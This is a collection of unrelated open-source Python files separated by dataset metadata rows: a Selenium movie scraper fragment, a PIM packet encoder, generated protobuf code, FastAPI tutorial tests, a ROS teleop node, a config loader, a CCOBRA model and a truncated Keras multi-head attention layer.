        # the last page has no such link, so the wait times out
a_next = wait.until(EC.presence_of_element_located((By.PARTIAL_LINK_TEXT,'下一页')))
a_next.click()
show_current_page()
except TimeoutException:
        # The next page could not be found
print('get all movies.')
        # It could also be a genuine network error
finally:
browser.quit()
if __name__=='__main__':
main()
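# Usage note (assumptions: Selenium 3+ with Firefox and geckodriver on the PATH):
#   $ python selenium_maoyan_movie_top100.py
# Each run appends the scraped rows to movie.csv in the order
# [rank, name, star, release time, score].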
| 28.576923
| 136
| 0.650875
|
794e46ed8189b9210f962129da05e25ef523a6d8
| 3,596
|
py
|
Python
|
pimdm/packet/PacketPimEncodedUnicastAddress.py
|
leoplo/pim_dm
|
e097fb8e247b14f142b6aa97d8ee34440aeba806
|
[
"MIT"
] | 6
|
2020-02-04T20:59:59.000Z
|
2021-11-24T09:56:07.000Z
|
pimdm/packet/PacketPimEncodedUnicastAddress.py
|
leoplo/pim_dm
|
e097fb8e247b14f142b6aa97d8ee34440aeba806
|
[
"MIT"
] | 4
|
2020-04-10T14:51:39.000Z
|
2022-02-14T00:59:21.000Z
|
pimdm/packet/PacketPimEncodedUnicastAddress.py
|
leoplo/pim_dm
|
e097fb8e247b14f142b6aa97d8ee34440aeba806
|
[
"MIT"
] | 3
|
2020-08-13T17:56:35.000Z
|
2021-11-24T11:03:12.000Z
|
import ipaddress
import struct
import socket
'''
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Addr Family | Encoding Type | Unicast Address
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+...
'''
class PacketPimEncodedUnicastAddress:
PIM_ENCODED_UNICAST_ADDRESS_HDR = "! BB %s"
PIM_ENCODED_UNICAST_ADDRESS_HDR_WITHOUT_UNICAST_ADDRESS = "! BB"
IPV4_HDR = "4s"
IPV6_HDR = "16s"
    # TODO: double-check how the IP version is handled
PIM_ENCODED_UNICAST_ADDRESS_HDR_WITHOUT_UNICAST_ADDRESS_LEN = struct.calcsize(PIM_ENCODED_UNICAST_ADDRESS_HDR_WITHOUT_UNICAST_ADDRESS)
PIM_ENCODED_UNICAST_ADDRESS_HDR_LEN = struct.calcsize(PIM_ENCODED_UNICAST_ADDRESS_HDR % IPV4_HDR)
PIM_ENCODED_UNICAST_ADDRESS_HDR_LEN_IPV6 = struct.calcsize(PIM_ENCODED_UNICAST_ADDRESS_HDR % IPV6_HDR)
FAMILY_RESERVED = 0
FAMILY_IPV4 = 1
FAMILY_IPV6 = 2
def __init__(self, unicast_address):
if type(unicast_address) not in (str, bytes):
raise Exception
if type(unicast_address) is bytes:
unicast_address = socket.inet_ntoa(unicast_address)
self.unicast_address = unicast_address
def bytes(self) -> bytes:
(string_ip_hdr, hdr_addr_family, socket_family) = PacketPimEncodedUnicastAddress.get_ip_info(self.unicast_address)
ip = socket.inet_pton(socket_family, self.unicast_address)
msg = struct.pack(PacketPimEncodedUnicastAddress.PIM_ENCODED_UNICAST_ADDRESS_HDR % string_ip_hdr, hdr_addr_family, 0, ip)
return msg
@staticmethod
def get_ip_info(ip):
version = ipaddress.ip_address(ip).version
if version == 4:
return (PacketPimEncodedUnicastAddress.IPV4_HDR, PacketPimEncodedUnicastAddress.FAMILY_IPV4, socket.AF_INET)
elif version == 6:
return (PacketPimEncodedUnicastAddress.IPV6_HDR, PacketPimEncodedUnicastAddress.FAMILY_IPV6, socket.AF_INET6)
else:
raise Exception("Unknown address family")
def __len__(self):
version = ipaddress.ip_address(self.unicast_address).version
if version == 4:
return self.PIM_ENCODED_UNICAST_ADDRESS_HDR_LEN
elif version == 6:
return self.PIM_ENCODED_UNICAST_ADDRESS_HDR_LEN_IPV6
else:
raise Exception("Unknown address family")
@staticmethod
def parse_bytes(data: bytes):
data_without_unicast_addr = data[0:PacketPimEncodedUnicastAddress.PIM_ENCODED_UNICAST_ADDRESS_HDR_WITHOUT_UNICAST_ADDRESS_LEN]
(addr_family, encoding) = struct.unpack(PacketPimEncodedUnicastAddress.PIM_ENCODED_UNICAST_ADDRESS_HDR_WITHOUT_UNICAST_ADDRESS, data_without_unicast_addr)
data_unicast_addr = data[PacketPimEncodedUnicastAddress.PIM_ENCODED_UNICAST_ADDRESS_HDR_WITHOUT_UNICAST_ADDRESS_LEN:]
if addr_family == PacketPimEncodedUnicastAddress.FAMILY_IPV4:
(ip,) = struct.unpack("! " + PacketPimEncodedUnicastAddress.IPV4_HDR, data_unicast_addr[:4])
ip = socket.inet_ntop(socket.AF_INET, ip)
elif addr_family == PacketPimEncodedUnicastAddress.FAMILY_IPV6:
(ip,) = struct.unpack("! " + PacketPimEncodedUnicastAddress.IPV6_HDR, data_unicast_addr[:16])
ip = socket.inet_ntop(socket.AF_INET6, ip)
else:
raise Exception("Unknown address family")
if encoding != 0:
print("unknown encoding")
raise Exception
return PacketPimEncodedUnicastAddress(ip)
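# Illustrative round trip (example address only):
#   addr = PacketPimEncodedUnicastAddress("10.0.0.1")
#   addr.bytes().hex() -> '01000a000001'   # family=1 (IPv4), encoding=0, 4 address bytes
#   PacketPimEncodedUnicastAddress.parse_bytes(bytes.fromhex('01000a000001')).unicast_address -> '10.0.0.1'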
| 44.95
| 162
| 0.688821
|
794e471bc3e7d44e0993fab1c14ff85b963914e7
| 9,198
|
py
|
Python
|
agent_admin_sdk/model/collector_service/alias_metric_with_one_original_metric_pb2.py
|
easyopsapis/easyops-api-python
|
adf6e3bad33fa6266b5fa0a449dd4ac42f8447d0
|
[
"Apache-2.0"
] | 5
|
2019-07-31T04:11:05.000Z
|
2021-01-07T03:23:20.000Z
|
agent_admin_sdk/model/collector_service/alias_metric_with_one_original_metric_pb2.py
|
easyopsapis/easyops-api-python
|
adf6e3bad33fa6266b5fa0a449dd4ac42f8447d0
|
[
"Apache-2.0"
] | null | null | null |
agent_admin_sdk/model/collector_service/alias_metric_with_one_original_metric_pb2.py
|
easyopsapis/easyops-api-python
|
adf6e3bad33fa6266b5fa0a449dd4ac42f8447d0
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: alias_metric_with_one_original_metric.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from agent_admin_sdk.model.collector_service import metric_pb2 as agent__admin__sdk_dot_model_dot_collector__service_dot_metric__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='alias_metric_with_one_original_metric.proto',
package='collector_service',
syntax='proto3',
serialized_options=_b('ZKgo.easyops.local/contracts/protorepo-models/easyops/model/collector_service'),
serialized_pb=_b('\n+alias_metric_with_one_original_metric.proto\x12\x11\x63ollector_service\x1a\x34\x61gent_admin_sdk/model/collector_service/metric.proto\"\xb5\x03\n*CollectorAliasMetricWithOneOiriginalMetric\x12\x15\n\rcalculateOnly\x18\x01 \x01(\x08\x12;\n\x0f\x63ollectorMetric\x18\x02 \x01(\x0b\x32\".collector_service.CollectorMetric\x12T\n\rdependMetrics\x18\x03 \x03(\x0b\x32=.collector_service.CollectorAliasMetricWithOneOiriginalMetric\x12\x12\n\ninstanceId\x18\x04 \x01(\t\x12\x0c\n\x04name\x18\x05 \x01(\t\x12P\n\x04\x64ims\x18\x06 \x03(\x0b\x32\x42.collector_service.CollectorAliasMetricWithOneOiriginalMetric.Dims\x12\x0f\n\x07version\x18\x07 \x01(\x05\x12\x14\n\x0cisCalculated\x18\x08 \x01(\x08\x12\x12\n\nexpression\x18\t \x01(\t\x1a.\n\x04\x44ims\x12\x0f\n\x07\x64imName\x18\x01 \x01(\t\x12\x15\n\roriginDimName\x18\x02 \x01(\tBMZKgo.easyops.local/contracts/protorepo-models/easyops/model/collector_serviceb\x06proto3')
,
dependencies=[agent__admin__sdk_dot_model_dot_collector__service_dot_metric__pb2.DESCRIPTOR,])
_COLLECTORALIASMETRICWITHONEOIRIGINALMETRIC_DIMS = _descriptor.Descriptor(
name='Dims',
full_name='collector_service.CollectorAliasMetricWithOneOiriginalMetric.Dims',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='dimName', full_name='collector_service.CollectorAliasMetricWithOneOiriginalMetric.Dims.dimName', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='originDimName', full_name='collector_service.CollectorAliasMetricWithOneOiriginalMetric.Dims.originDimName', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=512,
serialized_end=558,
)
_COLLECTORALIASMETRICWITHONEOIRIGINALMETRIC = _descriptor.Descriptor(
name='CollectorAliasMetricWithOneOiriginalMetric',
full_name='collector_service.CollectorAliasMetricWithOneOiriginalMetric',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='calculateOnly', full_name='collector_service.CollectorAliasMetricWithOneOiriginalMetric.calculateOnly', index=0,
number=1, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='collectorMetric', full_name='collector_service.CollectorAliasMetricWithOneOiriginalMetric.collectorMetric', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='dependMetrics', full_name='collector_service.CollectorAliasMetricWithOneOiriginalMetric.dependMetrics', index=2,
number=3, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='instanceId', full_name='collector_service.CollectorAliasMetricWithOneOiriginalMetric.instanceId', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='name', full_name='collector_service.CollectorAliasMetricWithOneOiriginalMetric.name', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='dims', full_name='collector_service.CollectorAliasMetricWithOneOiriginalMetric.dims', index=5,
number=6, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='version', full_name='collector_service.CollectorAliasMetricWithOneOiriginalMetric.version', index=6,
number=7, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='isCalculated', full_name='collector_service.CollectorAliasMetricWithOneOiriginalMetric.isCalculated', index=7,
number=8, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='expression', full_name='collector_service.CollectorAliasMetricWithOneOiriginalMetric.expression', index=8,
number=9, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[_COLLECTORALIASMETRICWITHONEOIRIGINALMETRIC_DIMS, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=121,
serialized_end=558,
)
_COLLECTORALIASMETRICWITHONEOIRIGINALMETRIC_DIMS.containing_type = _COLLECTORALIASMETRICWITHONEOIRIGINALMETRIC
_COLLECTORALIASMETRICWITHONEOIRIGINALMETRIC.fields_by_name['collectorMetric'].message_type = agent__admin__sdk_dot_model_dot_collector__service_dot_metric__pb2._COLLECTORMETRIC
_COLLECTORALIASMETRICWITHONEOIRIGINALMETRIC.fields_by_name['dependMetrics'].message_type = _COLLECTORALIASMETRICWITHONEOIRIGINALMETRIC
_COLLECTORALIASMETRICWITHONEOIRIGINALMETRIC.fields_by_name['dims'].message_type = _COLLECTORALIASMETRICWITHONEOIRIGINALMETRIC_DIMS
DESCRIPTOR.message_types_by_name['CollectorAliasMetricWithOneOiriginalMetric'] = _COLLECTORALIASMETRICWITHONEOIRIGINALMETRIC
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
CollectorAliasMetricWithOneOiriginalMetric = _reflection.GeneratedProtocolMessageType('CollectorAliasMetricWithOneOiriginalMetric', (_message.Message,), {
'Dims' : _reflection.GeneratedProtocolMessageType('Dims', (_message.Message,), {
'DESCRIPTOR' : _COLLECTORALIASMETRICWITHONEOIRIGINALMETRIC_DIMS,
'__module__' : 'alias_metric_with_one_original_metric_pb2'
# @@protoc_insertion_point(class_scope:collector_service.CollectorAliasMetricWithOneOiriginalMetric.Dims)
})
,
'DESCRIPTOR' : _COLLECTORALIASMETRICWITHONEOIRIGINALMETRIC,
'__module__' : 'alias_metric_with_one_original_metric_pb2'
# @@protoc_insertion_point(class_scope:collector_service.CollectorAliasMetricWithOneOiriginalMetric)
})
_sym_db.RegisterMessage(CollectorAliasMetricWithOneOiriginalMetric)
_sym_db.RegisterMessage(CollectorAliasMetricWithOneOiriginalMetric.Dims)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
| 51.385475
| 940
| 0.791803
|
794e48e1d5f2aefda26e6c495b302a1abb79ab68
| 10,355
|
py
|
Python
|
tests/test_tutorial/test_bigger_applications/test_main.py
|
cdeil/fastapi
|
7a445402d4960d6173d76dac43393ad6c5040521
|
[
"MIT"
] | 2
|
2020-01-21T10:57:59.000Z
|
2021-11-09T11:27:18.000Z
|
tests/test_tutorial/test_bigger_applications/test_main.py
|
cdeil/fastapi
|
7a445402d4960d6173d76dac43393ad6c5040521
|
[
"MIT"
] | null | null | null |
tests/test_tutorial/test_bigger_applications/test_main.py
|
cdeil/fastapi
|
7a445402d4960d6173d76dac43393ad6c5040521
|
[
"MIT"
] | null | null | null |
import pytest
from starlette.testclient import TestClient
from bigger_applications.app.main import app
client = TestClient(app)
openapi_schema = {
"openapi": "3.0.2",
"info": {"title": "Fast API", "version": "0.1.0"},
"paths": {
"/users/": {
"get": {
"responses": {
"200": {
"description": "Successful Response",
"content": {"application/json": {"schema": {}}},
}
},
"tags": ["users"],
"summary": "Read Users",
"operationId": "read_users_users__get",
}
},
"/users/me": {
"get": {
"responses": {
"200": {
"description": "Successful Response",
"content": {"application/json": {"schema": {}}},
}
},
"tags": ["users"],
"summary": "Read User Me",
"operationId": "read_user_me_users_me_get",
}
},
"/users/{username}": {
"get": {
"responses": {
"200": {
"description": "Successful Response",
"content": {"application/json": {"schema": {}}},
},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
"tags": ["users"],
"summary": "Read User",
"operationId": "read_user_users__username__get",
"parameters": [
{
"required": True,
"schema": {"title": "Username", "type": "string"},
"name": "username",
"in": "path",
}
],
}
},
"/items/": {
"get": {
"responses": {
"404": {"description": "Not found"},
"200": {
"description": "Successful Response",
"content": {"application/json": {"schema": {}}},
},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
"tags": ["items"],
"summary": "Read Items",
"operationId": "read_items_items__get",
"parameters": [
{
"required": True,
"schema": {"title": "X-Token", "type": "string"},
"name": "x-token",
"in": "header",
}
],
}
},
"/items/{item_id}": {
"get": {
"responses": {
"404": {"description": "Not found"},
"200": {
"description": "Successful Response",
"content": {"application/json": {"schema": {}}},
},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
"tags": ["items"],
"summary": "Read Item",
"operationId": "read_item_items__item_id__get",
"parameters": [
{
"required": True,
"schema": {"title": "Item Id", "type": "string"},
"name": "item_id",
"in": "path",
},
{
"required": True,
"schema": {"title": "X-Token", "type": "string"},
"name": "x-token",
"in": "header",
},
],
},
"put": {
"responses": {
"404": {"description": "Not found"},
"403": {"description": "Operation forbidden"},
"200": {
"description": "Successful Response",
"content": {"application/json": {"schema": {}}},
},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
"tags": ["custom", "items"],
"summary": "Update Item",
"operationId": "update_item_items__item_id__put",
"parameters": [
{
"required": True,
"schema": {"title": "Item Id", "type": "string"},
"name": "item_id",
"in": "path",
},
{
"required": True,
"schema": {"title": "X-Token", "type": "string"},
"name": "x-token",
"in": "header",
},
],
},
},
},
"components": {
"schemas": {
"ValidationError": {
"title": "ValidationError",
"required": ["loc", "msg", "type"],
"type": "object",
"properties": {
"loc": {
"title": "Location",
"type": "array",
"items": {"type": "string"},
},
"msg": {"title": "Message", "type": "string"},
"type": {"title": "Error Type", "type": "string"},
},
},
"HTTPValidationError": {
"title": "HTTPValidationError",
"type": "object",
"properties": {
"detail": {
"title": "Detail",
"type": "array",
"items": {"$ref": "#/components/schemas/ValidationError"},
}
},
},
}
},
}
@pytest.mark.parametrize(
"path,expected_status,expected_response,headers",
[
("/users", 200, [{"username": "Foo"}, {"username": "Bar"}], {}),
("/users/foo", 200, {"username": "foo"}, {}),
("/users/me", 200, {"username": "fakecurrentuser"}, {}),
(
"/items",
200,
[{"name": "Item Foo"}, {"name": "item Bar"}],
{"X-Token": "fake-super-secret-token"},
),
(
"/items/bar",
200,
{"name": "Fake Specific Item", "item_id": "bar"},
{"X-Token": "fake-super-secret-token"},
),
("/items", 400, {"detail": "X-Token header invalid"}, {"X-Token": "invalid"}),
(
"/items/bar",
400,
{"detail": "X-Token header invalid"},
{"X-Token": "invalid"},
),
(
"/items",
422,
{
"detail": [
{
"loc": ["header", "x-token"],
"msg": "field required",
"type": "value_error.missing",
}
]
},
{},
),
(
"/items/bar",
422,
{
"detail": [
{
"loc": ["header", "x-token"],
"msg": "field required",
"type": "value_error.missing",
}
]
},
{},
),
("/openapi.json", 200, openapi_schema, {}),
],
)
def test_get_path(path, expected_status, expected_response, headers):
response = client.get(path, headers=headers)
assert response.status_code == expected_status
assert response.json() == expected_response
def test_put_no_header():
response = client.put("/items/foo")
assert response.status_code == 422
assert response.json() == {
"detail": [
{
"loc": ["header", "x-token"],
"msg": "field required",
"type": "value_error.missing",
}
]
}
def test_put_invalid_header():
response = client.put("/items/foo", headers={"X-Token": "invalid"})
assert response.status_code == 400
assert response.json() == {"detail": "X-Token header invalid"}
def test_put():
response = client.put("/items/foo", headers={"X-Token": "fake-super-secret-token"})
assert response.status_code == 200
assert response.json() == {"item_id": "foo", "name": "The Fighters"}
def test_put_forbidden():
response = client.put("/items/bar", headers={"X-Token": "fake-super-secret-token"})
assert response.status_code == 403
assert response.json() == {"detail": "You can only update the item: foo"}
| 34.401993
| 87
| 0.336456
|
794e4ceb179c309aed1103a48f26961085e0a19a
| 2,580
|
py
|
Python
|
cuboid_teleop/scripts/teleop_emotion.py
|
sbgisen/cuboid_sim
|
02a881c64ea0f7aa9770ce78c741953887dd0fc9
|
[
"Apache-2.0"
] | null | null | null |
cuboid_teleop/scripts/teleop_emotion.py
|
sbgisen/cuboid_sim
|
02a881c64ea0f7aa9770ce78c741953887dd0fc9
|
[
"Apache-2.0"
] | 3
|
2019-12-06T06:29:05.000Z
|
2019-12-16T10:18:35.000Z
|
cuboid_teleop/scripts/teleop_emotion.py
|
sbgisen/cuboid_sim
|
02a881c64ea0f7aa9770ce78c741953887dd0fc9
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# Copyright (c) 2019, SoftBank corp.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import rospy
from sensor_msgs.msg import Joy
from std_msgs.msg import String
class TeleopEmotion(object):
_CONTROL_HZ = 4
def __init__(self):
self.emo_anger_pressed_ = False
self.emo_bright_pressed_ = False
self.emo_sad_pressed_ = False
self.emo_puzzle_pressed_ = False
self.emergence_pressed_ = False
rospy.init_node("teleop_face", anonymous=True)
self._init_params()
self._init_pubsub()
rospy.Timer(rospy.Duration(1. / self._CONTROL_HZ), self._timer_callback)
def _init_params(self):
self.emo_anger_ = rospy.get_param("~emotion_anger", 12)
self.emo_bright_ = rospy.get_param("~emotion_bright", 13)
self.emo_sad_ = rospy.get_param("~emotion_sad", 14)
self.emo_puzzle_ = rospy.get_param("~emotion_puzzle", 15)
        self.emergence_ = rospy.get_param("~emergence", 3)
def _init_pubsub(self):
rospy.Subscriber("joy", Joy, self._update_joy)
self.pub = rospy.Publisher("emotion", String, queue_size=10)
def _update_joy(self, joy):
self.emo_anger_pressed_ = joy.buttons[self.emo_anger_]
self.emo_bright_pressed_ = joy.buttons[self.emo_bright_]
self.emo_sad_pressed_ = joy.buttons[self.emo_sad_]
self.emo_puzzle_pressed_ = joy.buttons[self.emo_puzzle_]
self.emergence_pressed_ = joy.buttons[self.emergence_]
def _timer_callback(self, msg):
if self.emo_anger_pressed_:
self.pub.publish("anger")
elif self.emo_bright_pressed_:
self.pub.publish("bright")
elif self.emo_sad_pressed_:
self.pub.publish("sad")
elif self.emo_puzzle_pressed_:
self.pub.publish("puzzle")
elif self.emergence_pressed_:
rospy.signal_shutdown("Shutdown signal button is pressed")
else:
self.pub.publish("hello")
if __name__ == "__main__":
node = TeleopEmotion()
rospy.spin()
| 33.506494
| 80
| 0.684884
|
794e4f6f9b9f4f8054e6ac6751a68083c96912f9
| 920
|
py
|
Python
|
easyq/configuration.py
|
easyqiot/easyq
|
0718fdfefbbd4cb85edaa696c2d2ae9e1225ead7
|
[
"MIT"
] | 4
|
2018-11-12T07:31:16.000Z
|
2020-03-04T08:59:58.000Z
|
easyq/configuration.py
|
pylover/easyq
|
0718fdfefbbd4cb85edaa696c2d2ae9e1225ead7
|
[
"MIT"
] | 1
|
2018-11-02T09:38:24.000Z
|
2018-11-02T09:38:24.000Z
|
easyq/configuration.py
|
easyqiot/easyq
|
0718fdfefbbd4cb85edaa696c2d2ae9e1225ead7
|
[
"MIT"
] | 1
|
2018-09-07T08:43:31.000Z
|
2018-09-07T08:43:31.000Z
|
import pymlconf
settings = pymlconf.DeferredRoot()
DEFAULT_ADDRESS = 'localhost:1085'
BUILTIN_CONFIGURATION = f'''
bind: {DEFAULT_ADDRESS}
authentication:
method: trust
logging:
level: debug
queues:
default:
maxsize: 100
dispatchers: 1
dispatcher:
messages_per_queue: 5
intervals: .3
'''
def configure(init_value=None, filename=None, force=None):
""" Load configurations
.. seealso:: `pymlconf Documentations <https://github.com/pylover/pymlconf#documentation>`_
:param args: positional arguments pass into ``pymlconf.DeferredConfigManager.load``
:param kwargs: keyword arguments pass into ``pymlconf.DeferredConfigManager.load``
"""
settings.initialize(
BUILTIN_CONFIGURATION,
force=force
)
if init_value is not None:
settings.merge(init_value)
if filename is not None:
settings.load_file(filename)
return settings
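# Illustrative usage, relying only on the builtin defaults above:
#   configure(force=True)
#   settings.bind                    -> 'localhost:1085'
#   settings.queues.default.maxsize  -> 100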
| 18.039216
| 95
| 0.708696
|
794e4f702ff8b7bd7c70e06cbbff4dd855a008ff
| 1,011
|
py
|
Python
|
relational/student_projects/2020_karkkainen/models/Baseline/Most-Frequent-Answer/model3ps.py
|
monthie/cogmods
|
62af4b8bf2effb77f26a8877d6a89949164d83f0
|
[
"MIT"
] | null | null | null |
relational/student_projects/2020_karkkainen/models/Baseline/Most-Frequent-Answer/model3ps.py
|
monthie/cogmods
|
62af4b8bf2effb77f26a8877d6a89949164d83f0
|
[
"MIT"
] | 11
|
2020-05-04T09:05:29.000Z
|
2021-04-08T13:22:34.000Z
|
relational/student_projects/2020_karkkainen/models/Baseline/Most-Frequent-Answer/model3ps.py
|
monthie/cogmods
|
62af4b8bf2effb77f26a8877d6a89949164d83f0
|
[
"MIT"
] | 12
|
2020-05-02T09:36:14.000Z
|
2021-06-22T08:10:45.000Z
|
""" Implements a most frequent answer model.
"""
import numpy as np
import ccobra
import pandas as pd
def createDict():
data = pd.read_csv('3ps.csv')
keys = data['Task-ID'].tolist()
values = data['most_frequent_response'].tolist()
return dict(zip(keys, values))
class MostFreqModel(ccobra.CCobraModel):
""" Model producing the most frequent answer as a response.
"""
    def __init__(self, name='MostFrequentAnswer'):
        """ Initializes the most-frequent-answer model.
Parameters
----------
name : str
Unique name of the model. Will be used throughout the CCOBRA
framework as a means for identifying the model.
"""
self.answers = createDict()
super(MostFreqModel, self).__init__(
name, ["spatial-relational"], ["verify", "single-choice"])
def predict(self, item, **kwargs):
""" Predicts the most frequent answer for the given task ID """
return self.answers[kwargs['Task-ID']]
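# A minimal usage sketch, not part of the original model file. It assumes the
# '3ps.csv' lookup table is present next to the script and that CCOBRA supplies
# the task identifier through the 'Task-ID' keyword, as predict() above expects;
# the task id value 1 is a hypothetical example.
if __name__ == '__main__':
    model = MostFreqModel()
    print(model.predict(None, **{'Task-ID': 1}))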
| 23.511628
| 72
| 0.621167
|
794e4f83a1a78d257a2bd3cdb6b9aff836d88fd7
| 2,800
|
py
|
Python
|
Transformer/MHA.py
|
antoniorv6/Transformer-Keras
|
9566f4211f92922a668977e72dbb72b722d4de5e
|
[
"MIT"
] | null | null | null |
Transformer/MHA.py
|
antoniorv6/Transformer-Keras
|
9566f4211f92922a668977e72dbb72b722d4de5e
|
[
"MIT"
] | null | null | null |
Transformer/MHA.py
|
antoniorv6/Transformer-Keras
|
9566f4211f92922a668977e72dbb72b722d4de5e
|
[
"MIT"
] | null | null | null |
import tensorflow as tf
from tensorflow.keras.layers import Dense, Softmax
class MHA(tf.keras.layers.Layer):
def __init__(self, model_depth, num_heads):
super(MHA, self).__init__()
self.num_heads = num_heads
self.model_depth = model_depth
assert model_depth % self.num_heads == 0
self.depth = model_depth // num_heads
self.wQ = Dense(model_depth) #Q weights
self.wK = Dense(model_depth) #K weights
self.wV = Dense(model_depth) #V weights
self.output_linear = Dense(model_depth)
def split_heads(self, x, batch_size):
#Split the last dimension into (num_heads, depth) where depth is the model_depth // num_heads
x = tf.reshape(x, (batch_size, -1, self.num_heads, self.depth))
#We transpose the result that the shape is (batch_size, num_heads, seq_len, depth)
return tf.transpose(x, perm=[0,2,1,3])
@staticmethod
def scaled_dot_product_attention(q, k, v, mask):
matmul_qk = tf.matmul(q, k, transpose_b=True) #(..., seq_len_q, seq_len_k)
#Scale the matmul
k_dim = tf.cast(tf.shape(k)[-1], tf.float32)
scaled_attention_logits = matmul_qk / tf.math.sqrt(k_dim)
#add mask to the scaled tensor (this will happen in the decoder layers)
if mask is not None:
scaled_attention_logits += (mask * -1e9)
attention_weights = Softmax(axis=-1)(scaled_attention_logits) # (..., seq_len_q, seq_len_k)
        output = tf.matmul(attention_weights, v) # Multiply by V to get the attention effect on the real values
return output, attention_weights
#kwargs -> (v,k,q,mask)
def __call__(self, inputs, k, q, mask):
v = inputs
batch_size = tf.shape(q)[0]
Q = self.wQ(q) #(batch_size, seq_len, d_model)
K = self.wK(k) #(batch_size, seq_len, d_model)
V = self.wV(v) #(batch_size, seq_len, d_model)
Q = self.split_heads(Q, batch_size) # (batch_size, num_heads, seq_len_q, depth)
K = self.split_heads(K, batch_size) # (batch_size, num_heads, seq_len_k, depth)
V = self.split_heads(V, batch_size) # (batch_size, num_heads, seq_len_v, depth)
# scaled_attention.shape == (batch_size, num_heads, seq_len_q, depth)
# attention_weights.shape == (batch_size, num_heads, seq_len_q, seq_len_k)
scaled_attention, attention_weights = MHA.scaled_dot_product_attention(Q, K, V, mask)
scaled_attention = tf.transpose(scaled_attention, perm=[0,2,1,3]) # (batch_size, seq_len_q, num_heads, depth)
concat_attention = tf.reshape(scaled_attention, (batch_size, -1, self.model_depth)) #(batch_size, seq_len_q, model_depth)
output = self.output_linear(concat_attention)
return output, attention_weights
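# A minimal shape-check sketch, not part of the original module; it assumes
# TensorFlow 2.x eager execution, and the batch size, sequence length and model
# depth below are arbitrary example values.
if __name__ == '__main__':
    batch, seq_len, d_model = 2, 16, 128
    mha = MHA(model_depth=d_model, num_heads=8)
    x = tf.random.uniform((batch, seq_len, d_model))
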